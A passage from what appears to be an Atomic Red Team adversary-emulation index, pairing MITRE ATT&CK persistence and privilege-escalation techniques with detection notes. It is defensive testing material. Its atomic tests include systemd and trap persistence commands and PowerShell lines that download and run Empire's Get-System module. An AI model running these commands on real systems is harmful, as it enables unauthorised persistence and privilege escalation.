https://www.freedesktop.org/wiki/Software/systemd/ - description: Freedesktop.org. (2018, September 29). systemd System and Service - Manager. Retrieved April 23, 2019. - - source_name: Anomali Rocke March 2019 - url: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang - description: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With - a New Malware Family Written in Golang. Retrieved April 24, 2019. - - source_name: Rapid7 Service Persistence 22JUNE2016 - url: https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence - description: Rapid7. (2016, June 22). Service Persistence. Retrieved April - 23, 2019. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-09T13:46:29.701Z' - created: '2020-01-17T16:15:19.870Z' - x_mitre_platforms: - - Linux - x_mitre_detection: |- - Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. - - Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -–type=service –all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables. - - Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution. - x_mitre_permissions_required: - - User - - root - x_mitre_is_subtechnique: true - x_mitre_version: '1.2' - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_contributors: - - Tony Lambert, Red Canary - identifier: T1543.002 - atomic_tests: - - name: Create Systemd Service - auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c - description: 'This test creates a Systemd service unit file and enables it as - a service. - -' - supported_platforms: - - linux - input_arguments: - systemd_service_path: - description: Path to systemd service unit file - type: Path - default: "/etc/systemd/system" - systemd_service_file: - description: File name of systemd service unit file - type: String - default: art-systemd-service.service - execstoppost_action: - description: ExecStopPost action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstoppost-marker" - execreload_action: - description: ExecReload action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execreload-marker" - execstart_action: - description: ExecStart action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstart-marker" - execstop_action: - description: ExecStop action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstop-marker" - execstartpre_action: - description: ExecStartPre action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstartpre-marker" - execstartpost_action: - description: ExecStartPost action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstartpost-marker" - executor: - command: | - echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file} - echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file} - echo "" >> #{systemd_service_path}/#{systemd_service_file} - echo "[Service]" >> #{systemd_service_path}/#{systemd_service_file} - echo "Type=simple" - echo "ExecStart=#{execstart_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecStartPre=#{execstartpre_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecStartPost=#{execstartpost_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecReload=#{execreload_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecStop=#{execstop_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecStopPost=#{execstoppost_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "" >> #{systemd_service_path}/#{systemd_service_file} - echo "[Install]" >> #{systemd_service_path}/#{systemd_service_file} - echo "WantedBy=default.target" >> #{systemd_service_path}/#{systemd_service_file} - systemctl daemon-reload - systemctl enable #{systemd_service_file} - systemctl start #{systemd_service_file} - cleanup_command: | - systemctl stop #{systemd_service_file} - systemctl disable #{systemd_service_file} - rm -rf #{systemd_service_path}/#{systemd_service_file} - systemctl daemon-reload - name: bash - T1053.006: - technique: - id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21 - description: |- - Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) - - Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/. - - An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence. - name: Systemd Timers - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1053.006 - url: https://attack.mitre.org/techniques/T1053/006 - - source_name: archlinux Systemd Timers Aug 2020 - url: https://wiki.archlinux.org/index.php/Systemd/Timers - description: archlinux. (2020, August 11). systemd/Timers. Retrieved October - 12, 2020. - - source_name: 'Linux man-pages: systemd January 2014' - url: http://man7.org/linux/man-pages/man1/systemd.1.html - description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. - Retrieved April 23, 2019. - - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux - AUR Package Repository. Retrieved April 23, 2019. - url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/ - source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018 - - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public - Arch package compromise. Retrieved April 23, 2019. - url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a - source_name: gist Arch package compromise 10JUL2018 - - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved - April 23, 2019. - url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html - source_name: acroread package compromised Arch Linux Mail 8JUL2018 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-14T15:20:00.754Z' - created: '2020-10-12T17:50:31.584Z' - x_mitre_platforms: - - Linux - x_mitre_contributors: - - SarathKumar Rajendran, Trimble Inc - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_detection: |- - Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. - - Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables. - - Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020) - x_mitre_permissions_required: - - User - - root - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1053.006 - atomic_tests: - - name: Create Systemd Service and Timer - auto_generated_guid: f4983098-bb13-44fb-9b2c-46149961807b - description: "This test creates Systemd service and timer then starts and enables - the Systemd timer \n" - supported_platforms: - - linux - input_arguments: - path_to_systemd_service: - description: Path to systemd service unit file - type: Path - default: "/etc/systemd/system/art-timer.service" - path_to_systemd_timer: - description: Path to service timer file - type: Path - default: "/etc/systemd/system/art-timer.timer" - systemd_service_name: - description: Name of systemd service - type: String - default: art-timer.service - systemd_timer_name: - description: Name of systemd service timer - type: String - default: art-timer.timer - executor: - command: | - echo "[Unit]" > #{path_to_systemd_service} - echo "Description=Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_service} - echo "[Service]" >> #{path_to_systemd_service} - echo "Type=simple" >> #{path_to_systemd_service} - echo "ExecStart=/bin/touch /tmp/art-systemd-timer-marker" >> #{path_to_systemd_service} - echo "[Install]" >> #{path_to_systemd_service} - echo "WantedBy=multi-user.target" >> #{path_to_systemd_service} - echo "[Unit]" > #{path_to_systemd_timer} - echo "Description=Executes Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_timer} - echo "Requires=#{systemd_service_name}" >> #{path_to_systemd_timer} - echo "[Timer]" >> #{path_to_systemd_timer} - echo "Unit=#{systemd_service_name}" >> #{path_to_systemd_timer} - echo "OnCalendar=*-*-* *:*:00" >> #{path_to_systemd_timer} - echo "[Install]" >> #{path_to_systemd_timer} - echo "WantedBy=timers.target" >> #{path_to_systemd_timer} - systemctl start #{systemd_timer_name} - systemctl enable #{systemd_timer_name} - systemctl daemon-reload - cleanup_command: | - systemctl stop #{systemd_timer_name} - systemctl disable #{systemd_timer_name} - rm #{path_to_systemd_service} - rm #{path_to_systemd_timer} - systemctl daemon-reload - name: bash - T1055.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.003 - url: https://attack.mitre.org/techniques/T1055/003 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Thread Execution Hijacking - description: "Adversaries may inject malicious code into hijacked processes - in order to evade process-based defenses as well as possibly elevate privileges. - Thread Execution Hijacking is a method of executing arbitrary code in the - address space of a separate live process. \n\nThread Execution Hijacking is - commonly performed by suspending an existing process then unmapping/hollowing - its memory, which can then be replaced with malicious code or the path to - a DLL. A handle to an existing victim process is first created with native - Windows API calls such as OpenThread. At this point the process - can be suspended then written to, realigned to the injected code, and resumed - via SuspendThread , VirtualAllocEx, WriteProcessMemory, - SetThreadContext, then ResumeThread respectively.(Citation: - Endgame Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) - but targets an existing process rather than creating a process in a suspended - state. \n\nRunning code in the context of another process may allow access - to the process's memory, system/network resources, and possibly elevated privileges. - Execution via Thread Execution Hijacking may also evade detection from security - products since the execution is masked under a legitimate process. " - id: attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:21:29.233Z' - created: '2020-01-14T01:28:32.166Z' - x_mitre_defense_bypassed: - - Application control - - Anti-virus - x_mitre_data_sources: - - Process monitoring - - API monitoring - x_mitre_permissions_required: - - User - x_mitre_detection: "Monitoring Windows API calls indicative of the various types - of code injection may generate a significant amount of data and may not be - directly useful for defense unless collected under specific circumstances - for known bad sequences of calls, since benign use of API functions may be - common and difficult to distinguish from malicious behavior. Windows API calls - such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, - and those that can be used to modify memory within another process, such as - VirtualAllocEx/WriteProcessMemory, may be used for - this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze - process behavior to determine if a process is performing actions it usually - does not, such as opening network connections, reading files, or other suspicious - actions that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - atomic_tests: [] - T1055.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.005 - url: https://attack.mitre.org/techniques/T1055/005 - - url: https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html - description: Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif - Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. - Retrieved December 18, 2017. - source_name: FireEye TLS Nov 2017 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Thread Local Storage - description: "Adversaries may inject malicious code into processes via thread - local storage (TLS) callbacks in order to evade process-based defenses as - well as possibly elevate privileges. TLS callback injection is a method of - executing arbitrary code in the address space of a separate live process. - \n\nTLS callback injection involves manipulating pointers inside a portable - executable (PE) to redirect a process to malicious code before reaching the - code's legitimate entry point. TLS callbacks are normally used by the OS to - setup and/or cleanup data used by threads. Manipulating TLS callbacks may - be performed by allocating and writing to specific offsets within a process’ - memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) - techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: - FireEye TLS Nov 2017)\n\nRunning code in the context of another process may - allow access to the process's memory, system/network resources, and possibly - elevated privileges. Execution via TLS callback injection may also evade detection - from security products since the execution is masked under a legitimate process. " - id: attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:23:30.093Z' - created: '2020-01-14T01:30:41.092Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_data_sources: - - Process monitoring - - API monitoring - x_mitre_detection: "Monitoring Windows API calls indicative of the various types - of code injection may generate a significant amount of data and may not be - directly useful for defense unless collected under specific circumstances - for known bad sequences of calls, since benign use of API functions may be - common and difficult to distinguish from malicious behavior. Windows API calls - such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, - and those that can be used to modify memory within another process, such as - VirtualAllocEx/WriteProcessMemory, may be used for - this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze - process behavior to determine if a process is performing actions it usually - does not, such as opening network connections, reading files, or other suspicious - actions that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - atomic_tests: [] - T1547.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.003 - url: https://attack.mitre.org/techniques/T1547/003 - - url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top - description: Microsoft. (2018, February 1). Windows Time Service (W32Time). - Retrieved March 26, 2018. - source_name: Microsoft W32Time Feb 2018 - - url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx - description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. - source_name: Microsoft TimeProvider - - url: https://github.com/scottlundgren/w32time - description: Lundgren, S. (2017, October 28). w32time. Retrieved March 26, - 2018. - source_name: Github W32Time Oct 2017 - - url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings - description: Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. - Retrieved March 26, 2018. - source_name: Microsoft W32Time May 2017 - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Time Providers - description: |- - Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider) - - Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider) - - Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017) - id: attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T15:24:26.476Z' - created: '2020-01-24T15:51:52.317Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - SYSTEM - - Administrator - x_mitre_detection: |- - Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017) - - The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns) - x_mitre_data_sources: - - API monitoring - - Binary file metadata - - DLL monitoring - - File monitoring - - Loaded DLLs - - Process monitoring - x_mitre_contributors: - - Scott Lundgren, @5twenty9, Carbon Black - x_mitre_platforms: - - Windows - atomic_tests: [] - T1134.001: - technique: - created: '2020-02-18T16:39:06.289Z' - modified: '2020-03-26T21:29:18.608Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d - description: |- - Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. - - An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system. - name: Token Impersonation/Theft - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1134.001 - url: https://attack.mitre.org/techniques/T1134/001 - - url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing - description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved - April 21, 2017. - source_name: Microsoft Command-line Logging - x_mitre_platforms: - - Windows - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Access tokens - - API monitoring - x_mitre_detection: |- - If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging) - - Analysts can also monitor for use of Windows APIs such as DuplicateToken(Ex), ImpersonateLoggedOnUser , and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. - x_mitre_defense_bypassed: - - Windows User Account Control - - System access controls - - File system access controls - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1134.001 - atomic_tests: - - name: Named pipe client impersonation - auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966 - description: |- - Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context. - When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). - - Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ - supported_platforms: - - windows - executor: - command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' - -UseBasicParsing); Get-System -Technique NamedPipe -Verbose - name: powershell - elevation_required: true - - name: "`SeDebugPrivilege` token duplication" - auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0 - description: |- - Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process. - When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). - supported_platforms: - - windows - executor: - command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' - -UseBasicParsing); Get-System -Technique Token -Verbose - name: powershell - elevation_required: true - T1546.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.005 - url: https://attack.mitre.org/techniques/T1546/005 - - source_name: Trap Manual - url: https://ss64.com/bash/trap.html - description: ss64. (n.d.). trap. Retrieved May 21, 2019. - - source_name: Cyberciti Trap Statements - url: https://bash.cyberciti.biz/guide/Trap_statement - description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21, - 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Trap - description: |- - Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. - - Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements) - id: attack-pattern--63220765-d418-44de-8fae-694b3912317d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T16:43:02.273Z' - created: '2020-01-24T14:17:43.906Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: Trap commands must be registered for the shell or programs, - so they appear in files. Monitoring files for suspicious or overly broad trap - commands can narrow down suspicious behavior during an investigation. Monitor - for suspicious processes executed through trap interrupts. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_platforms: - - macOS - - Linux - identifier: T1546.005 - atomic_tests: - - name: Trap - auto_generated_guid: a74b2e07-5952-4c03-8b56-56274b076b61 - description: | - After exiting the shell, the script will download and execute. - After sending a keyboard interrupt (CTRL+C) the script will download and execute. - supported_platforms: - - macos - - linux - executor: - command: | - trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" EXIT - exit - trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" SIGINt - name: sh - T1055.014: - technique: - id: attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5 - description: "Adversaries may inject malicious code into processes via VDSO - hijacking in order to evade process-based defenses as well as possibly elevate - privileges. Virtual dynamic shared object (vdso) hijacking is a method of - executing arbitrary code in the address space of a separate live process. - \n\nVDSO hijacking involves redirecting calls to dynamically linked shared - libraries. Memory protections may prevent writing executable code to a process - via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). - However, an adversary may hijack the syscall interface code stubs mapped into - a process from the vdso shared object to execute syscalls to open and map - a malicious shared object. This code can then be invoked by redirecting the - execution flow of the process via patched memory address references stored - in a process' global offset table (which store absolute addresses of mapped - library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace - VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)\n\nRunning code in - the context of another process may allow access to the process's memory, system/network - resources, and possibly elevated privileges. Execution via VDSO hijacking - may also evade detection from security products since the execution is masked - under a legitimate process. " - name: VDSO Hijacking - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1055.014 - url: https://attack.mitre.org/techniques/T1055/014 - - source_name: ELF Injection May 2009 - url: https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html - description: O'Neill, R. (2009, May). Modern Day ELF Runtime infection via - GOT poisoning. Retrieved March 15, 2020. - - source_name: Backtrace VDSO - url: https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/ - description: backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. - Retrieved June 15, 2020. - - source_name: VDSO Aug 2005 - url: https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/ - description: Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved - June 16, 2020. - - source_name: Syscall 2014 - url: https://lwn.net/Articles/604515/ - description: Drysdale, D. (2014, July 16). Anatomy of a system call, part - 2. Retrieved June 16, 2020. - - description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: - Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved - December 20, 2017.' - source_name: ArtOfMemoryForensics - - url: https://www.gnu.org/software/acct/ - description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved - December 20, 2017. - source_name: GNU Acct - - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing - description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide - - Chapter 7 - System Auditing. Retrieved December 20, 2017. - source_name: RHEL auditd - - url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html - description: stderr. (2014, February 14). Detecting Userland Preload Rootkits. - Retrieved December 20, 2017. - source_name: Chokepoint preload rootkits - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:28:45.232Z' - created: '2020-01-14T01:35:00.781Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace - and mmap, that can be used to attach to, manipulate memory, then redirect - a processes' execution path. Monitoring for Linux specific calls such as the - ptrace system call should not generate large amounts of data due to their - specialized nature, and can be a very effective method to detect some of the - common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: - GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) - \n\nAnalyze process behavior to determine if a process is performing actions - it usually does not, such as opening network connections, reading files, or - other suspicious actions that could relate to post-compromise behavior. " - x_mitre_data_sources: - - System calls - - Process monitoring - x_mitre_platforms: - - Linux - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1078: - technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1078 - url: https://attack.mitre.org/techniques/T1078 - - external_id: CAPEC-560 - source_name: capec - url: https://capec.mitre.org/data/definitions/560.html - - url: https://technet.microsoft.com/en-us/library/dn535501.aspx - description: Microsoft. (2016, April 15). Attractive Accounts for Credential - Theft. Retrieved June 3, 2016. - source_name: TechNet Credential Theft - - url: https://technet.microsoft.com/en-us/library/dn487457.aspx - description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved - June 3, 2016. - source_name: TechNet Audit Policy - description: |- - Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. - - The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) - name: Valid Accounts - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-10-19T16:01:22.724Z' - created: '2017-05-31T21:31:00.645Z' - x_mitre_version: '2.1' - x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring - x_mitre_defense_bypassed: - - Firewall - - Host intrusion prevention systems - - Network intrusion detection system - - Application control - - System access controls - - Anti-virus - x_mitre_detection: |- - Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login 